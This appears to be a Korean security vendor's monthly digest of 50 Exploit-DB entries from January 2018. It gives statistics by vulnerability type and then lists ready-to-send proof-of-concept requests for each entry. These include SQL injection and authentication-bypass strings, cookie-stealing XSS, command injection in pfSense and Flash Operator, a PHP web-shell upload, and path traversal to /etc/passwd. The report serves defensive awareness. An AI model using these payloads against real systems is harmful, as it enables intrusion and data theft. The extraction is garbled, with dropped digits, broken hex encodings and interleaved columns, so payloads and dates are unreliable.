EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 208 년 월 EDB 분석보고서에공개된취약점은모두 50 개입니다. 이가장많은수의취약점이공개된공격은 SQL Injection 입니다. 특히공격난이도와위험도가모두 ' ' 인공격또한 SQL Injection 입니다. 모두 ' ' 인 SQL Injection 케이스 "Advantech WebAccess < 8.3 " 취약점은 URL 경로간에공격코드가삽입되는특이한취약점입니다. 해당취약점을포함여 EDB 분석보고서에공개된취약점에대해예방기위해서최신패치와시큐어코딩을권장합니다. 지만완벽한시큐어코딩은불가능며, 지속적으로보안성을유지기위해서웹방화벽을활용한심층방어 (Defense indepth) 구현을고려해야합니다.. 취약점별보고개수 취약점 보고개수 File Upload 2 Command Injection 3 5 XSS 8 SQL Injection 32 60 50 40 30 취약점별보고개수 32 50 총합계 50 20 0 0 8 5 2 3 File Upload Command Injection XSS SQL Injection 총합계 2. 위험도별분류 위험도 보고개수 백분율 37 74.00% 3 6.00% 위험도별분류 0 20.00% 총합계 50 00.00% 0 3. 공격난이도별현황 공격난이도 보고개수 백분율 3 6.00% 3 62.00% 6 32.00% 총합계 50 00.00% 3 37 4. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 4 CentOS Web 3 2 Local 2 PACSOne Server 2 Easy Car 204 Joomla! Component Picture Calendar for Joomla Quickad Gespage EMC xpression Worpress Service Finder Booking Zechat Photos in Wifi LearnDash Smart Google Code Inserter Muviko Buddy Zone Events Calendar Joomla! Component Visual Calendar Shopware LiveCRM SaaS Cloud SAP NetWeaver J2EE Engine Affiligator Xnami Wchat pfsense Tumder ImgHosting Flexible Poll Domains & Hostings Manager Learning Management System RISE Task Rabbit Clone ILIAS Multilanguage Real Estate MLM Flash Operator Advantech WebAccess Zomato Clone Joomla! Component CP Event Calendar Reservo Image Hosting Hot s Clone SugarCRM 총합계 50 공격난이도별현황 3 6 3 주요소프트웨어별취약점발생현황 4 3 2 2 2 CentOS Web Local PACSOne Server Easy Car 204 Joomla! Component Picture Calendar for Joomla Quickad Gespage EMC xpression

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 208-0-03 43420 SQL Injection Smart Google Code Inserter < 3.5 POST /wp-admin/options-general.php?page=smartcode HTTP/. POST /wp-admin/options-general.php?page=smartcode HTTP/. action=saveadwords&delconf=&oid[]= OR =-- &ppccap[]=ex:mywplead&ppcpageid[]=&ppccode[]=bb&nchkdel=o n Smart Smart Google Code Google Code Inserter Inserter < 3.5 208-0-03 43422 SQL Injection EMC xpression 4.5SP Patch 3 - 'model.jobhistoryid' SQL Injection /xdashboard/html/jobhistory/jobdochistorylist.action?model. jobhistoryid=736687378927029792022348433 and =2 EMC xpression EMC xpression 4.5SP Patch 3 POST /gespage/webapp/users/prnow.jsp HTTP/. 208-0-05 43447 SQL Injection Gespage 7.4.8 show_prn=');select PG_SLEEP(3)-- POST /ges/webapp/users/blhistory.jsp HTTP/. Gespage Gespage 7.4.8 show_month=');select PG_SLEEP(3)-- 208-0-08 43457 Photos in Wifi.0. - Path /asset.php?id=40c9c332-857b-4cb8-b848-59a30aa9cf3b&ext=[../not_allowed_directory/].[ext] Photos in Wifi Photos in Wifi.0. POST / HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 208-0-08 4346 File Upload LearnDash 2.5.3 - Arbitrary File Upload -----------------------------7dd0029908f2 Content-Disposition: form-data; name="uploadfiles[]"; filename="@./shell.php.php Content-Type: application/octet-stream <?php echo exec("ls -la /etc/passwd"); -----------------------------7dd0029908f2-- Content-Disposition: form-data; name="post" LearnDash LearnDash 2.5.3 foobar -----------------------------7dd0029908f2-- Content-Disposition: form-data; name="course_id" foobar -----------------------------7dd0029908f2-- Content-Disposition: form-data; name="course_id" foobar -----------------------------7dd0029908f2-- 208-0-08 43844 SQL Injection < 6.7.2-3429 POST /photo/include/blog/label.php HTTP/. < 6.7.2-3429 action=get_article_label&article_id=; SELECT version(); -- 208-0-08 43844 < 6.7.2-3429 POST /photo/include/file_upload.php?dir=2f2e2e2f406707073746f72 652f50686f7 HTTP/. < 6.7.2-3429 action=aviary_add&url=file:///etc/passwd 208-0-0 43475 Worpress Service Finder Booking < 3.2 - Local File Disclosure /wp-content/plugins/sfbooking/lib/downloads.php?file=/etc/passwd Worpress Service Finder Booking Worpress Service Finder Booking < 3.2

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. POST /login.php HTTP/. 208-0-0 43477 SQL Injection Muviko. email=admin@dmin.com'%2b(select*from(select(sleep(20)))a)%2 b'&password=admxn&login= Muviko Muviko. 추가적인참고정보 # SQL Injection: load_season.php form parameter [GET] season_id # SQL Injection get_raring.php parameter [GET] movie_id # SQL Injection update_rating.php parameters [GET] rating,movie_id # SQL Injection set_player_source.php parameters [GET] id 208-0-0 43479 SQL Injection Events Calendar - 'event_id' SQL Injection /event.php?event_id=- 23%20union%20all%20select%20,2,@@version,4,5,6,7,8,9,0, Events Calendar,2,3,4,5,6,7,8,9,20,2,22,23,24,25,26,27,28,29-- Events Calendar POST /UDDISecurityService/UDDISecurityImplBean HTTP/. 208-0-0 43495 SQL Injection SAP NetWeaver J2EE Engine 7.40 <soapenv:envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/"> <soapenv:header/> <soapenv:body> <sec:deletepermissionbyid> <permissionid>' AND =(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-52%') AND ''='</permissionid> </sec:deletepermissionbyid> </soapenv:body> </soapenv:envelope> SAP NetWeaver J2EE Engine SAP NetWeaver J2EE Engine 7.40 208-0-2 43535 XSS Xnami.0 - Cross -Site ing POST /media/ajax HTTP/. Xnami Xnami.0 method=addcomment&comment="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe>&mediaid=6 208-0-5 43560 Command Injection pfsense < 2..4 - 'status_rrd_graph_img.php' Command Injection /status_rrd_graph_img.php?database=queues;+printf+'ls - al'+'sh' pfsense pfsense < 2..4 208-0-5 43567 XSS ImgHosting.5 /?search="><script>confirm(document.domain)<%2fscript> ImgHosting ImgHosting.5 208-0-5 43569 SQL Injection Domains & Hostings Manager PRO 3.0 - Authentication Bypass POST /dhrpro_demo/login.php HTTP/. Domains & Hostings Manager Domains & Hostings Manager PRO 3.0 accusername=admin%27+or+%27%27%3d%27&accuserpassword=admi n%27+or+%27%27%3d%27&login=+enter+ 208-0-5 4359 SQL Injection RISE.9 - 'search' SQL Injection POST /index.php/knowledge_base/get_article_suggestion/ HTTP/. RISE RISE.9 search=product'%20and%20(select*from(select(sleep(20)))a)-- %20 208-0-5 43595 208-0-5 43600 Command Injection Command Injection ILIAS < 5.2.4 Flash Operator 2.3.03 - Command Execution /setup/setup.php?cmd="><script>alert()</script> /ucp/index.php?quietmode=337&module=callforward&command=./ &ls -al ILIAS Flash Operator ILIAS < 5.2.4 Flash Operator 2.3.03 POST /demo/foodpanda/myacount.php HTTP/. User-Agent: Mozilla/5.0 (Windows NT 0.0; Win64; x64; rv:57.0) Gecko/20000 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q =0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Content-Disposition: form-data; name="fname" Content-Disposition: form-data; name="lname" Content-Disposition: form-data; name="email" @.com Content-Disposition: form-data; name="phone" 23 Content-Disposition: form-data; name="image"; filename="info.php.jpg" (change extension to.php) Content-Type: image/jpeg

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 208-0-5 43667 File Upload Zomato Clone - Arbitrary File Upload <?php phpinfo();?> Content-Disposition: form-data; name="addr" Zomato Clone Zomato Clone Content-Disposition: form-data; name="addr2" Content-Disposition: form-data; name="post" Content-Disposition: form-data; name="country" Content-Disposition: form-data; name="state" 3945 Content-Disposition: form-data; name="city" 635 Content-Disposition: form-data; name="location" Content-Disposition: form-data; name="update" Upload -- 208-0-7 43676 XSS Reservo Image Hosting.5 /search/?s=image&t=%27%29%3b%2522%2520style%253d%22%3cscrip t%3ealert%28%29%3c%2fscript%3e%3c Reservo Image Hosting Reservo Image Hosting.5 208-0-7 43683 XSS SugarCRM 3.5. /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> SugarCRM SugarCRM 3.5. /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> POST /backend/customer/ HTTP/. 208-0-2 43849 XSS Shopware 5.2.5/5.3 {"id":22,"groupkey":"ek","email":"test@test.de","active":tr ue,"accountmode":0,"confirmationkey": "","paymentid":5,"firstlogin":"206-08- 8T00:00:00","lastLogin":"206-08- 8T7:22:23","newsletter":0,"validation":0," languageid":,"shopid":,"pricegroupid":0, "internalcomment":"testcomment","failedlogins":0,"referer":"","default_billing_add ress_id":22," default_shipping_address_id":22, "newpassword":"","amount":402.9,"ordercount":,"canceledord eramount": 0,"shopName":"Hauptshop Deutsch","language":"Deutsch","birthday":"6.05.985","titl e":""," salutation":"mr","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <"," Shopware Shopware 5.2.5/5.3 lastname":"test[injected SCRIPT CODE]>"<iframe "number":"20028","billing":[{"id":22,"salutation":"mr","com pany":""," department":"","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert (document.cookie) <","title":"","lastname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",,"additionaladdressline":"","additionaladdressline2":"", "salutationsnippet":"herr","countryid":2,"number":"","phone ":"","vat Id":"","stateId":null}],"shipping":[{"id":23,"salutation":" mr","company":"","department":"", "firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","title":"", "lastname":"test[injected SCRIPT CODE]>"<iframe,"additionalAddressLine":"", "additionaladdressline2":"","salutationsnippet":"herr","cou ntryid":2,"stateid":null}],"debit": [],"paymentdata":[{"accountnumber":"","bankcode":"","bankna me":"","accountholder":"","bic":"", "iban":"","usebillingdata":false,"id":null}]} /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> POST /backend/customer/ HTTP/.

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 208-0-2 43850 XSS CentOS Web 0.9.8.2 {"id":22,"groupkey":"ek","email":"test@test.de","active":tr ue,"accountmode":0,"confirmationkey": "","paymentid":5,"firstlogin":"206-08- 8T00:00:00","lastLogin":"206-08- 8T7:22:23","newsletter":0,"validation":0," languageid":,"shopid":,"pricegroupid":0, "internalcomment":"testcomment","failedlogins":0,"referer":"","default_billing_add ress_id":22," default_shipping_address_id":22, "newpassword":"","amount":402.9,"ordercount":,"canceledord eramount": 0,"shopName":"Hauptshop Deutsch","language":"Deutsch","birthday":"6.05.985","titl e":""," salutation":"mr","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <"," lastname":"test[injected SCRIPT CODE]>"<iframe "number":"20028","billing":[{"id":22,"salutation":"mr","com pany":""," CentOS Web CentOS Web 0.9.8.2 department":"","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert (document.cookie) <","title":"","lastname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",,"additionaladdressline":"","additionaladdressline2":"", "salutationsnippet":"herr","countryid":2,"number":"","phone ":"","vat Id":"","stateId":null}],"shipping":[{"id":23,"salutation":" mr","company":"","department":"", "firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","title":"", "lastname":"test[injected SCRIPT CODE]>"<iframe,"additionalAddressLine":"", "additionaladdressline2":"","salutationsnippet":"herr","cou ntryid":2,"stateid":null}],"debit": [],"paymentdata":[{"accountnumber":"","bankcode":"","bankna me":"","accountholder":"","bic":"", "iban":"","usebillingdata":false,"id":null}]} 208-0-2 43850 XSS CentOS Web 0.9.8.2 POST /index.php?module=mail_add-new HTTP/. CentOS Web CentOS Web 0.9.8.2 ifpost=yes&email_address="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe>&domain=domain.com&password="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe> 208-0-23 43855 XSS CentOS Web 0.9.8.2 - 'row_id' / 'domain' SQL Injection POST /index.php?module=list_domains HTTP/. CentOS Web CentOS Web 0.9.8.2 ifpost=yes&username=&domain=' or =--&row_id=' or =- - 208-0-23 43860 SQL Injection LiveCRM SaaS Cloud.0 /livecrm/web/index.php?r=site/login&company_id=%3%20%4f%52 %20%3%20%47%52%4f%55%50%20%42%59%20%43%4f%4e%43%4%54%5f%5 7%53%28%30%78%33%6%2c%56%45%52%53%49%4f%4e%28%29%2c%46%4c% 4f%4f%52%28%52%4%4e%44%28%30%29%2a%32%29%29%20%48%4%56%49 %4e%47%20%4d%49%4e%28%30%29%20%4f%52%20%3 LiveCRM SaaS Cloud LiveCRM SaaS Cloud.0 208-0-23 4386 SQL Injection Affiligator 2..0 /search/?q=&price_type=range&price=%3%30%30%20%6%6e%64%28 %73%65%6c%65%63%74%2%56%65%72%4%79%6%72%69%2d%7e%30%2e%2 0%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20% 67%72%6f%75%70%5f%63%6f%6e%63%6%74%28%56%65%72%73%69%6f%6e %28%29%29%29%79%29%78%29 Affiligator Affiligator 2..0 208-0-23 43863 SQL Injection Easy Car 204 /site_search.php?s_vehicletype=auto&s_order=[sql]&s_row=%35 %3%20%2f%2a%2%30%35%35%35%35%50%72%6f%63%65%64%75%72%65%2 a%2f%20%2f%2a%2%30%35%35%35%35%4%6e%6%6c%79%73%65%2a%2f% 20%28%65%78%74%72%6%63%74%76%6%6c%75%65%28%30%2c%2f%2a%2 %30%35%35%35%35%63%6f%6e%63%6%74%2a%2f%28%30%78%32%37%2c%3 0%78%33%6%2c%40%40%76%65%72%73%69%6f%6e%2c%64%6%74%6%62% 6%73%65%28%29%29%29%2c%30%29%2d%2d%20%2d Easy Car 204 Easy Car 204 208-0-23 43864 SQL Injection Wchat.5 POST /login.php HTTP/. Wchat Wchat.5 User=' UNION ALL SELECT 0x3,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x33,0 x34--& Pass=anything 208-0-23 43865 SQL Injection Zechat.5 POST /login.php HTTP/. Zechat Zechat.5 User=' UNION ALL SELECT 0x3,0x32,0x33,concat(0x63)--& Pass=anything

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 208-0-23 43866 SQL Injection Tumder 2. /category/%2d%33%20%20%2f%2a%2%30%3%3%3%3%55%4e%49%4f% 4e%2a%2f%20%2f%2a%2%30%3%3%3%3%4%4c%4c%2a%2f%20%2f%2a %2%30%3%3%3%3%53%45%4c%45%43%54%2a%2f%20%30%78%33%3%2 c%30%78%33%32%2c%43%4f%4e%43%4%54%28%44%6%74%6%62%6%73% 65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44 %4%54%4%42%4%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%2 8%29%29%2d%2d%20%2d Tumder Tumder 2. 208-0-23 43868 SQL Injection Quickad 4.0 /listing?keywords=' UNION ALL SELECT NULL,CONCAT(version(),0x7e7e,database()),NULL-- gllf&location=all%20united%20states&placetype=country&place id=23[sql]&cat=[sql]&subcat=5[sql]&filter=&sort=newest&sub mit= Quickad Quickad 4.0 208-0-23 43869 SQL Injection Flexible Poll.2 /mobile_preview.php?id=- 74'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!0 8888select*/+count(*)/*!08888from*/(information_schema.colu mns)where@:=export_set(5,export_set(5,@,/*!08888table_name* /,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5-- Flexible Poll Flexible Poll.2 208-0-23 43870 SQL Injection Local.0 /sellers_subcategories.php?industryid=- 05++/*!08888uNiOn*/(/*!08888SelECt*/+0x307832383333239,0x 283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:= 0,(/*!08888select*/+count(*)/*!08888from*/(information_sche ma.columns)where@:=export_set(5,export_set(5,@,/*!08888tabl e_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2) ),0x283629,0x283729)-- Local Local.0 208-0-24 43870 SQL Injection Local.0 /suppliers.php?industryid=[sql]&categoryid=- 05++/*!08888uNiOn*/(/*!08888SelECt*/+0x307832383333239,0x 283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:= 0,(/*!08888select*/+count(*)/*!08888from*/(information_sche ma.columns)where@:=export_set(5,export_set(5,@,/*!08888tabl e_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2) ),0x283629,0x283729)-- Local Local.0 208-0-26 4390 SQL Injection Learning Management System - 'course_id' SQL Injection /?type=scoring-status-student&course_id=- 999999+union+select+,2,3,user()%23 Learning Management System Learning Management System 208-0-28 43907 PACSOne Server 6.6.2 DICOM Web Viewer - Trasversal /pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.i ni /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..% 2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd PACSOne Server PACSOne Server 6.6.2 DICOM Web Viewer 208-0-28 43908 SQL Injection PACSOne Server 6.6.2 DICOM Web Viewer POST /pacs/usersignup.php HTTP/. hostname=localhost&database=dicom&username=- 999999+union+select+,2,3,user()%23&password=22222222&first name=&lastname=&email=- 999999+union+select+,2,3,user()%23&action=Sign+Up PACSOne Server PACSOne Server 6.6.2 DICOM Web Viewer 208-0-28 4394 SQL Injection Task Rabbit Clone.0 - 'id' SQL Injection /pages/single_blog.php?id=%3%20%20%2f%2a%2%3%33%33%33%37 %55%4e%49%4f%4e%2a%2f%20%2f%2a%2%3%33%33%33%37%53%45%4c%4 Task Rabbit Clone 5%43%54%2a%2f%20%3%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c% 34%2c%35%2c%36%2d%2d%20%2d Task Rabbit Clone.0 208-0-28 4395 SQL Injection.0 POST /index.php HTTP/..0 User=' OR -- -&Pass=bypass 208-0-28 4395 SQL Injection.0 /site.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38%38% 55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%45 %43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33%3%3 3%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38%38% 38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%33%6 %32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45%28%2 9%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38%35% 33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%65%2c %28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20%65%7 8%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f%2a% 2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6e%74 %28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28%69%6 e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63%6f% 6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74 %5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2 c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6%6d% 65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2f%2a %2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a%2f%2 c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78%33% 30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%32%38 %33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d.0 208-0-28 4395 SQL Injection.0 /pagelist.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38 %38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4 c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33% 3%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38 %38%38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%3 3%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45% 28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38 %35%33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%6 5%2c%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20% 65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f %2a%2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6 e%74%28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28% 69%6e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63 %6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%7 2%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28% 35%2c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6 %6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2 f%2a%2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a% 2f%2c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78 %33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%3 2%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d.0

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 208-0-28 4395 SQL Injection.0 /page_new.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38 %38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4 c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33% 3%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38 %38%38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%3 3%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45% 28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38 %35%33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%6 5%2c%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20% 65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f %2a%2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6 e%74%28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28% 69%6e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63 %6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%7 2%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28% 35%2c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6 %6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2 f%2a%2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a% 2f%2c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78 %33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%3 2%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d.0 208-0-28 4396 SQL Injection Hot s Clone - 'subctid' SQL Injection /categories?keyword=&mctid=[sql]&subctid=- Y2h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+( /*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count( Hot s Clone *)/*!08888from*/(information_schema.columns)where@:=export_ set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*! 08888column_name*/,0xa3a,2)),@,2))--+- Hot s Clone 208-0-28 4397 SQL Injection Multilanguage Real Estate MLM 3.0 - 'srch' SQL Injection /productlist.php?srch=%73%66%64%27%29%20%20%2f%2a%2%30%38%38%38%38 %55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%4 5%43%54%2a%2f%20%28%3%29%2c%28%32%29%2c%43%4f%4e%43%4%54% 5f%57%53%28%30%78%32%30%33%6%32%30%2c%55%53%45%52%28%29%2c %44%4%54%4%42%4%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%2 9%29%2c%28%34%29%29%2d%2d%20%2d Multilanguage Real Estate MLM Multilanguag e Real Estate MLM 3.0 208-0-28 4398 SQL Injection Buddy Zone 2.9.9 /chat_im/chat_window.php?request_id=- 55++/*!3337UNION*/+/*!3337SELECT*/+,(Select+export_set( 5,@:=0,(select+count(*)from(information_schema.columns)wher e@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),co lumn_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+- Buddy Zone Buddy Zone 2.9.9 208-0-30 43928 SQL Injection Advantech WebAccess < 8.3 /BWMobileService/BWScadaRest.svc/Login/notadmin'%20or%20'x' %3D'x/nopass/ Advantech WebAccess Advantech WebAccess < 8.3 208-0-30 4393 Joomla! Component Picture Calendar for Joomla 3..4 - /list.php?folder=../../../../etc/passwd Joomla! Component Picture Calendar for Joomla Joomla! Component Picture Calendar for Joomla 3..4 208-0-30 43932 SQL Injection Joomla! Component CP Event Calendar 3.0. - 'id' SQL Injection /index.php?option=com_cpeventcalendar&task=load&id=%2d%3%2 Joomla! 0%20%2f%2a%2%30%36%36%36%36%55%4e%49%4f%4e%2a%2f%20%2f%2a% Component CP Joomla! Component 2%30%36%36%36%36%53%45%4c%45%43%54%2a%2f%20CONCAT_WS(0x203 Event CP Event Calendar a20,user(),database(),version())%2c%32%2c%33%2c%34%2c%35%2c Calendar %36%2c%37%2d%2d%20%2d 3.0. 208-0-30 43933 SQL Injection Joomla! Component Visual Calendar 3..3 - 'id' SQL Injection /index.php?option=com_visualcalendar&view=load&id=- %20%20/*!06666UNION*/%20/*!06666SELECT*/%20(SELECT(@x)FROM (SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEM A.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d674696f6e5f7363 68656d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b,4,0x30 ),0x3a20,table_name,0x3c62723e))))x)%2c0x32%2c0x33%2c0x34%2 c0x35%2c0x36%2d%2d%20%2d Joomla! Component Visual Calendar Joomla! Component Visual Calendar 3..3